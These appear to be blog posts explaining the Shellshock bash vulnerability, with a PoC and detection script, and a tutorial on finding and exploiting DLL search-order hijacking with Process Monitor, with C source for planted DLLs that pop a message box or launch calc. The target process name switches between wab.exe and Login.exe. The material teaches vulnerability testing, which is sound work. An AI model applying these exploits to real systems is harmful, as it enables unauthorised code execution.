Cygwin provides a Unix-like command line environment on Windows: a POSIX compatibility layer plus the usual GNU tools, including the bash shell.
At the time of my testing, Cygwin shipped with bash 4.1.x, which is vulnerable to Shellshock (CVE-2014-6271); run "bash --version" to check the version of the installed shell.
To check for the vulnerability, execute the PoC below:
$ env x='() { :;}; echo vulnerable' bash -c 'echo Exploited!!'
Dissecting the PoC
env runs the given command (here bash -c '...') with the listed assignments added to its environment, so x='...' becomes an exported variable of the child bash.
x is the environment variable; a bash of that era treats any variable whose value starts with "() {" as a function definition to import, using the variable name (x) as the function name.
() { :;}; is the function definition (a body that does nothing) followed by the semicolon that terminates it.
echo vulnerable is the trailing data after the function definition. It is not part of the function, but a vulnerable bash executes it while importing the variable.
bash -c 'echo Exploited!!' is the command env launches. It prints Exploited!! on any bash; the word "vulnerable" printed before it is the indicator.
Issue
Because of the bug, bash does not stop parsing at the end of the imported function definition: it keeps interpreting the rest of the variable's value as shell commands and executes them. Any program that puts attacker-controlled data into an environment variable and then starts bash (a CGI script passing HTTP headers through the environment is the classic case) therefore hands the attacker arbitrary command execution.
The same PoC command can be used on Linux distributions to test for the presence of the Shellshock vulnerability.
Many Linux distributions have already released a patch for CVE-2014-6271, but that first patch was incomplete, and the remaining parser bug was assigned a new identifier, CVE-2014-7169, which is less severe than the original Shellshock issue.
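The checks above as a reusable script (an added example, not part of the original post): each function prints "vulnerable", "patched" or "no-bash" so the result can be consumed by other tooling. The CVE-2014-7169 probe is the widely circulated one for the incomplete fix; it is run in a throwaway directory because, on a bash that still has the parser bug, it writes a file named echo into the current directory. Function names are my own.

```shell
# Scripted Shellshock checks for CVE-2014-6271 and CVE-2014-7169.
# Each check prints one word on stdout: vulnerable, patched, or no-bash
# (when no bash binary is installed on the machine running the script).

# CVE-2014-6271: the trailing "echo vulnerable" must NOT run. The child
# command prints "Exploited!!" on every bash, so only the word "vulnerable"
# in the output is the indicator.
check_cve_2014_6271() {
    command -v bash >/dev/null 2>&1 || { echo no-bash; return 0; }
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo Exploited!!' 2>/dev/null) || :
    case "$out" in
        *vulnerable*) echo vulnerable ;;
        *)            echo patched ;;
    esac
}

# CVE-2014-7169: the incomplete first fix left a parser bug. With the value
# below, a still-vulnerable bash misparses the -c command so that the output
# of `date` lands in a file named "echo" in the current directory. A fixed
# bash simply prints the word "date" and creates no file. The probe runs in a
# scratch directory so the stray file cannot land somewhere it matters.
check_cve_2014_7169() {
    command -v bash >/dev/null 2>&1 || { echo no-bash; return 0; }
    dir=$(mktemp -d) || return 1
    ( cd "$dir" && env X='() { (a)=>\' bash -c 'echo date' >/dev/null 2>&1 ) || :
    if [ -e "$dir/echo" ]; then result=vulnerable; else result=patched; fi
    rm -rf "$dir"
    echo "$result"
}

# One line per CVE, e.g. "CVE-2014-6271: patched".
shellshock_report() {
    echo "CVE-2014-6271: $(check_cve_2014_6271)"
    echo "CVE-2014-7169: $(check_cve_2014_7169)"
}

shellshock_report
```

A bash that is patched against CVE-2014-6271 only (the first round of distribution updates) reports "patched" for the first check and "vulnerable" for the second; both must say "patched" before the host can be considered fixed.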
Friday, September 26, 2014
Sunday, September 21, 2014
Finding and Exploiting DLL Injection Vulnerabilities
We use Process Monitor (Procmon), part of the Sysinternals tools, to find the vulnerability.
Attempts by the process under analysis to load Dynamic Link Libraries (DLLs) that do not exist can be found with the Process Monitor filter below; every NAME NOT FOUND result for a .dll path is a directory the loader probed without finding the library:
Process Name is wab.exe then Include
Path ends with .dll then Include
Result is NAME NOT FOUND then Include
The filter above and the snapshot show that Login.exe could not find several DLLs, among them SXS.dll and CLBCATQ.dll.
Build a DLL from the code below, name the resulting file after one of the missing DLLs (SXS.dll or CLBCATQ.dll), and copy it into the directory from which we run the vulnerable binary. This works because the loader searches the application's own directory before the system directories, and the current directory before PATH, so for a DLL that is missing from the system directories a copy in either location is the one that gets loaded. DLLs on the KnownDLLs list are the exception: they are always mapped from the system copy, so a NAME NOT FOUND for one of them is not exploitable this way.
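For a longer capture it is easier to triage Procmon's "Export to CSV" output offline than to click through the GUI. The script below is an added example, not part of the original post: it applies the same three filter conditions with standard POSIX tools and then reduces the hits to the first directory probed per DLL name, which is where a planted copy has to sit. It assumes Procmon's default CSV layout (Time of Day, Process Name, PID, Operation, Path, Result, Detail, every field double-quoted); the capture embedded in write_sample_csv is constructed for the demonstration and is not a real trace, and all function names are my own.

```shell
# Offline triage of a Process Monitor "Export to CSV" file.
# Assumed layout (Procmon default): every field is double-quoted, columns are
#   Time of Day, Process Name, PID, Operation, Path, Result, Detail
# Because each field is quoted, splitting on the literal `","` separator is
# enough; no Procmon field contains that three-character sequence.

# Constructed sample capture for the demo (not a real trace).
write_sample_csv() {
    cat >"$1" <<'EOF'
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:02:13.1000000 AM","wab.exe","4120","CreateFile","C:\Program Files\Windows Mail\SXS.dll","NAME NOT FOUND","Desired Access: Read Attributes, Disposition: Open"
"10:02:13.1000100 AM","wab.exe","4120","CreateFile","C:\Windows\System32\SXS.dll","NAME NOT FOUND","Desired Access: Read Attributes, Disposition: Open"
"10:02:13.1000200 AM","wab.exe","4120","CreateFile","C:\Users\lab\Desktop\SXS.dll","NAME NOT FOUND","Desired Access: Read Attributes, Disposition: Open"
"10:02:13.1000300 AM","wab.exe","4120","CreateFile","C:\Program Files\Windows Mail\CLBCATQ.dll","NAME NOT FOUND","Desired Access: Read Attributes, Disposition: Open"
"10:02:13.1000400 AM","wab.exe","4120","CreateFile","C:\Windows\System32\CLBCATQ.dll","SUCCESS","Desired Access: Read Attributes, Disposition: Open"
"10:02:13.1000500 AM","wab.exe","4120","CreateFile","C:\Program Files\Windows Mail\wab.exe.Local","NAME NOT FOUND","Desired Access: Read Attributes, Disposition: Open"
"10:02:13.1000600 AM","explorer.exe","1000","CreateFile","C:\Windows\System32\foo.dll","NAME NOT FOUND","Desired Access: Read Attributes, Disposition: Open"
EOF
}

# Usage: find_missing_dlls capture.csv wab.exe
# Prints every .dll path the named process probed and did not find, in
# capture order. This is the Procmon filter from the post, applied by awk.
find_missing_dlls() {
    proc=$(printf '%s' "$2" | tr 'A-Z' 'a-z')
    awk -F '","' -v proc="$proc" '
        NR > 1 {
            sub(/\r$/, "")                         # tolerate CRLF line endings
            sub(/^"/, "", $1); sub(/"$/, "", $NF)  # drop the outer quotes
            if (tolower($2) != proc) next          # Process Name is <proc>
            if ($6 != "NAME NOT FOUND") next       # Result is NAME NOT FOUND
            if (tolower($5) !~ /\.dll$/) next      # Path ends with .dll
            print $5
        }' "$1"
}

# Usage: hijack_candidates capture.csv wab.exe
# The loader walks the search order and stops at the first hit, so the FIRST
# "NAME NOT FOUND" for a given DLL name is the directory a planted copy must be
# placed in. Prints "<dll name><TAB><directory>" once per DLL name.
hijack_candidates() {
    find_missing_dlls "$1" "$2" | awk '{
        n = split($0, parts, "\\")
        name = tolower(parts[n])
        dir = substr($0, 1, length($0) - length(parts[n]) - 1)
        if (!(name in seen)) { seen[name] = 1; print name "\t" dir }
    }'
}

# Demo run against the constructed capture.
demo=$(mktemp)
write_sample_csv "$demo"
hijack_candidates "$demo" wab.exe
rm -f "$demo"
```

On the sample this reports sxs.dll and clbcatq.dll, both first probed in C:\Program Files\Windows Mail; the wab.exe.Local probe is dropped because it is not a DLL, and the explorer.exe row because it belongs to another process. Before planting anything, check each candidate against the KnownDLLs list and confirm the reported directory is actually writable by the account you have.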
#include <windows.h>

/* Entry point of the planted DLL. The loader calls it with DLL_PROCESS_ATTACH
   as soon as the hijacked name resolves to our file, so the message box is
   proof that our code ran inside the target process. React only to process
   attach; otherwise the box would reappear for every thread the process
   creates. MessageBoxW is used explicitly because the strings are wide. */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved)
{
    (void)hModule;
    (void)lpReserved;
    if (fdwReason == DLL_PROCESS_ATTACH) {
        MessageBoxW(NULL, L"DLL Injection by Disects !",
                    L"developed by Praveen Darshanam",
                    MB_ICONWARNING | MB_CANCELTRYCONTINUE | MB_DEFBUTTON2);
    }
    return TRUE;
}
Search Process Monitor again for the DLL we planted; it now resolves to our copy.
When we execute the Login.exe binary, the loader picks up our DLL and runs the code in its DllMain.
To launch the calculator instead of showing a message box, the DLL can use the code below:
#include <windows.h>
#include <stdlib.h>

/* Launch calc.exe, then terminate the host process so it never gets further. */
int exec_calc(void)
{
    WinExec("calc", 0);   /* nCmdShow = 0, i.e. SW_HIDE */
    exit(0);
    return 0;             /* not reached */
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    (void)hinstDLL;
    (void)lpvReserved;
    if (fdwReason == DLL_PROCESS_ATTACH)
        exec_calc();
    return TRUE;          /* returning FALSE would make the loader reject the DLL */
}
Done!